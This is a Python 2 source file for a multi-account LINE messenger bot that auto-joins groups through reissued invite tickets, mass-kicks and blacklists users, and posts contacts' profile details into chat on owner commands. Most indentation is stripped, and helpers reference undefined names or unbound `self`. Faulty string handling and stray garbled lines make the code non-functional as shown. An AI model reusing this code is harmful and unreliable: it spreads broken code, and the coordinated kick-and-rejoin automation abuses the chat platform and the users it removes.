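def save_settings(path="wait_settings.json"):
    # Dump the current bot settings to disk as UTF-8 JSON.
    with codecs.open(path, "w", "utf-8") as f:
        json.dump(wait, f, ensure_ascii=False, indent=2)

def load_settings(path="wait_settings.json"):
    # Merge previously saved settings over the defaults defined above.
    try:
        with codecs.open(path, "r", "utf-8") as f:
            wait.update(json.load(f))
    except IOError:
        pass  # no saved settings yet; keep the defaults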
def upload_tempimage(client):
'''
Upload an image to Imgur with this client. Relies on the module-level
`album` and `image_path` names, which are not defined in this file.
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
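# Note: the three helpers below (sendImage, sendImageWithURL, post_content)
# take `self` and appear to have been copied from the LINE client class; they
# are never bound to an instance in this file, so as written they are not
# callable as plain functions.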
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self.Talk.client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
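# Note: sendMessage below builds a Message and bumps `messageReq`, but neither
# `profile` nor `messageReq` is defined in this file and the message is never
# actually dispatched; the function looks vestigial.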
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "\n・" + Name
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
    if msg.from_ in wait2["ROM"][msg.to]:
        del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
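# bot(op) below dispatches on the LINE operation type codes used by this
# library; as a rough legend (based on how they are handled here):
#   5  = contact added            11 = group settings updated
#   13 = invited into group       15 = member left group
#   17 = member joined group      19 = member kicked from group
#   22/24 = room invite / leave   26 = message received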
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if op.param2 in admin:
pass
else:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).updateGroup(G)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 in admin:
pass
else:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(DEF).cancelGroupInvitation(op.param1, gMembMids)
#------Cancel Invite User Finish------#
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
cl.inviteIntoGroup(op.param1,admin)
print "BOT 1 Joined"
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
kk.acceptGroupInvitation(op.param1)
kk.inviteIntoGroup(op.param1,admin)
print "BOT 2 Joined"
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
ki.acceptGroupInvitation(op.param1)
ki.inviteIntoGroup(op.param1,admin)
print "BOT 3 Joined"
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
kc.acceptGroupInvitation(op.param1)
kc.inviteIntoGroup(op.param1,admin)
print "BOT 4 Joined"
else:
print "autoJoin is Off"
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
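# Note: replace("", ',') puts a comma between every character of op.param3,
# so the split above yields single characters; a blacklist entry will only
# ever match here if it is exactly one character long.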
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = Amid.getGroup(op.param1)
G.preventJoinByTicket = False
Amid.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
Amid.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
# if op.param3 in Dmid:
# if op.param2 in Cmid:
# X = kc.getGroup(op.param1)
# X.preventJoinByTicket = False
# kc.updateGroup(X)
# Ti = kc.reissueGroupTicket(op.param1)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ks.updateGroup(X)
# Ti = ks.reissueGroupTicket(op.param1)
# if op.param3 in Emid:
# if op.param2 in Dmid:
# X = ks.getGroup(op.param1)
# X.preventJoinByTicket = False
# ks.updateGroup(X)
# Ti = ks.reissueGroupTicket(op.param1)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ka.updateGroup(X)
# Ti = ka.reissueGroupTicket(op.param1)
#
# if op.param3 in Fmid:
# if op.param2 in Emid:
# X = ka.getGroup(op.param1)
# X.preventJoinByTicket = False
# ka.updateGroup(X)
# Ti = ka.reissueGroupTicket(op.param1)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# kb.updateGroup(X)
# Ti = kb.reissueGroupTicket(op.param1)
# if op.param3 in Gmid:
# if op.param2 in Fmid:
# X = kb.getGroup(op.param1)
# X.preventJoinByTicket = False
# kb.updateGroup(X)
# Ti = kb.reissueGroupTicket(op.param1)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ko.updateGroup(X)
# Ti = ko.reissueGroupTicket(op.param1)
# if op.param3 in Hmid:
# if op.param2 in Gmid:
# X = ko.getGroup(op.param1)
# X.preventJoinByTicket = False
# ko.updateGroup(X)
# Ti = ko.reissueGroupTicket(op.param1)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ke.updateGroup(X)
# Ti = ke.reissueGroupTicket(op.param1)
# if op.param3 in Imid:
# if op.param2 in mid:
# X = cl.getGroup(op.param1)
# X.preventJoinByTicket = False
# cl.updateGroup(X)
# Ti = cl.reissueGroupTicket(op.param1)
# ku.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# cl.updateGroup(X)
# Ti = cl.reissueGroupTicket(op.param1)
if op.type == 13:
print op.param1
print op.param2
print op.param3
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 15:
random.choice(KAC).sendText(op.param1, "Good bye.")
print op.param3 + "has left the group"
#------Joined User Kick start------#
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
#------Joined User Kick start------#
if op.type == 17:
group = cl.getGroup(op.param1)
cb = Message()
cb.to = op.param1
cb.text = "Hi " + cl.getContact(op.param2).displayName + ", welcome to " + group.name
cl.sendMessage(cb)
if op.type == 19:
if op.param2 not in Bots:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if op.param3 in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,admin)
else:
pass
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
#ka.acceptGroupInvitationByTicket(op.param1,Ti)
#kb.acceptGroupInvitationByTicket(op.param1,Ti)
#ko.acceptGroupInvitationByTicket(op.param1,Ti)
#ke.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
#ka.acceptGroupInvitationByTicket(op.param1,Ti)
#kb.acceptGroupInvitationByTicket(op.param1,Ti)
#ko.acceptGroupInvitationByTicket(op.param1,Ti)
#ke.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
G = kc.getGroup(op.param1)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
# if Dmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ks.getGroup(op.param1)
# G.preventJoinByTicket = True
# ks.updateGroup(G)
# Ticket = ks.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Emid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ka.getGroup(op.param1)
# G.preventJoinByTicket = True
# ka.updateGroup(G)
# Ticket = ka.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Fmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
#ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = kb.getGroup(op.param1)
# G.preventJoinByTicket = True
# kb.updateGroup(G)
# Ticket = kb.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
#$ pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Gmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ko.getGroup(op.param1)
# G.preventJoinByTicket = True
# ko.updateGroup(G)
# Ticket = ko.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Hmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
#kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ke.getGroup(op.param1)
# G.preventJoinByTicket = True
# ke.updateGroup(G)
# Ticket = ke.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ in owner:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Decided not to comment.")
if wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Added to blacklist.")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
if wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["@Key","@key","@help","@Help"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["@set group"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("@Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("ZSI2 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("ZSI2 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("ZSI3 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("ZSI3 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("ZSI4 gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("ZSI4 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "@Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
cl.kickoutFromGroup(msg.to,[midd])
elif "@ZSI2 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("_second kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "@ZSI3 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("_third kick ","")
kk.kickoutFromGroup(msg.to,[midd])
elif "@ZSI4 kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("_fourth kick ","")
kc.kickoutFromGroup(msg.to,[midd])
elif "@Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "@Sinvite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("sinvite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "@Tinvite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("tinvite ","")
